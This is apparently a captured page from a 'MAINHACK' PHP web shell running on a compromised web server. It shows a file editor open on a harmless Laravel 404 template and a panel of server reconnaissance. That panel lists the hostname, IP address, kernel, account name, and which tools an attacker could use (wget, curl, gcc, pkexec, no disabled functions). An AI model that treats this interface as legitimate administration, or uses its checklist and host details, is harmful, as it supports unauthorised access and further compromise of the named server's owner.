[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 404.blade.php
<!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>404 Not Found!</title> <style> html, body { margin: 0; padding: 0; text-align: center; font-family: sans-serif; background-color: #E7FFFF; } h1, a { margin: 0; padding: 0; text-decoration: none; } .section { padding: 4rem 2rem; } .section .error { font-size: 150px; color: #008B62; text-shadow: 1px 1px 1px #00593E, 2px 2px 1px #00593E, 3px 3px 1px #00593E, 4px 4px 1px #00593E, 5px 5px 1px #00593E, 6px 6px 1px #00593E, 7px 7px 1px #00593E, 8px 8px 1px #00593E, 25px 25px 8px rgba(0, 0, 0, 0.2); } .page { margin: 2rem 0; font-size: 20px; font-weight: 600; color: #444; } .back-home { display: inline-block; border: 2px solid #222; color: #222; text-transform: uppercase; font-weight: 600; padding: 0.75rem 1rem 0.6rem; transition: all 0.2s linear; box-shadow: 0 3px 8px rgba(0, 0, 0, 0.3); } .back-home:hover { background: #222; color: #ddd; } </style> </head> <body> <div class="section"> <h1 class="error">{{ translate('common.404') }}</h1> <div class="page">{{ translate('common.Ooops!!! The page you are looking for is not found') }}</div> <a class="back-home" href="{{ url()->previous() }}">{{ translate('common.Go to back') }}</a> </div> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002